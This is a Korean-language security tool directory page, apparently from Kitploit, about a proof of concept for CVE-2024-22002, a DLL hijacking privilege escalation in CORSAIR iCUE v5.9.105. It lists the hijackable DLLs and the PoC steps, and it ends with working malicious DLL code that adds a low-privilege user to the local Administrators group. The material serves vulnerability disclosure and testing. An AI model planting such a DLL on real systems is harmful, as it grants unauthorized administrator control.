Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
iCUE_DllHijack_LPE-CVE-2024-22002 — CORSAIR iCUE v5.9.105의 업데이트 과정 중 DLL 하이재킹을 통해 로컬 권한 상승 취약점(CVE-2024-22002)을 증명하는 개념 증명 코드로, 권한이 없는 사용자가 SYSTEM 권한을 획득할 수 있게 합니다. | Kitploit
도구/GitHubGitHub/0xkickit/icue_dllhijack_lpe-cve-2024-22002
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHub0xkickit/icue_dllhijack_lpe-cve-2024-22002

iCUE_DllHijack_LPE-CVE-2024-22002

CORSAIR iCUE v5.9.105의 업데이트 과정 중 DLL 하이재킹을 통해 로컬 권한 상승 취약점(CVE-2024-22002)을 증명하는 개념 증명 코드로, 권한이 없는 사용자가 SYSTEM 권한을 획득할 수 있게 합니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
2년 전아직 검토되지 않음

취약한 소프트웨어 및 버전

  • 소프트웨어 다운로드 링크: CORSAIR iCUE v5.9.105 with iCUE Murals

설명

iCUE v5.9.105에서 DLL 하이재킹 취약점이 확인되었습니다. 이 취약점은 "iCUEUpdateService" 서비스가 관리하는 업데이트 프로세스 중에 발생합니다. 해당 서비스는 업데이트를 수행하는 프로세스("cuepkg.exe")를 생성하며, 이 프로세스는 "NT AUTHORITY\SYSTEM" 권한으로 실행됩니다. 프로세스 시작 시 iCUE 설치 디렉토리 내의 \cuepkg-1.2.6 디렉토리에서 여러 DLL을 검색합니다. 이러한 DLL 중 일부는 기본적으로 존재하지 않지만, 일반 사용자가 해당 디렉토리에 파일을 생성할 수 있는 권한을 가지고 있으므로 공격자가 악성 DLL을 디렉토리에 주입할 가능성이 있습니다. 결과적으로 이 악성 DLL은 관리자 권한으로 cuepkg.exe에 로드됩니다.

발견된 영향을 받는 DLL은 다음과 같습니다:

  • MSASN1.dll
  • NTASN1.dll
  • profapi.dll

CVSS 벡터: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

  • 기본 점수: 7.8 (높음)
  • 시간적 점수: 7.8 (높음)
  • 환경적 점수: 7.8 (높음)

PoC

예를 들어, DLL profapi.dll을 사용합니다.

  1. 악성 DLL을 생성하여 %INSTALLDIR%cuepkg-1.2.6 디렉토리에 추가합니다.
  2. 프로그램이 자동으로 업데이트되기를 기다리거나, 이 경우 "업데이트 확인"을 클릭하여 업데이트를 강제합니다.
  3. 관리자 권한이 없는 사용자가 그룹에 추가됩니다.

악성 DLL이 실행되기 전 lowpriv 사용자의 권한: lowpriv_cmd

악성 DLL이 실행된 후 lowpriv 사용자의 권한: lowpriv_cmd_adm

  • 악성 코드 예시:
root@kitploit:~
#include "pch.h"
#include <windows.h>
#include <cstdlib>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    {
        system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
    }
    break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}
도구 다운로드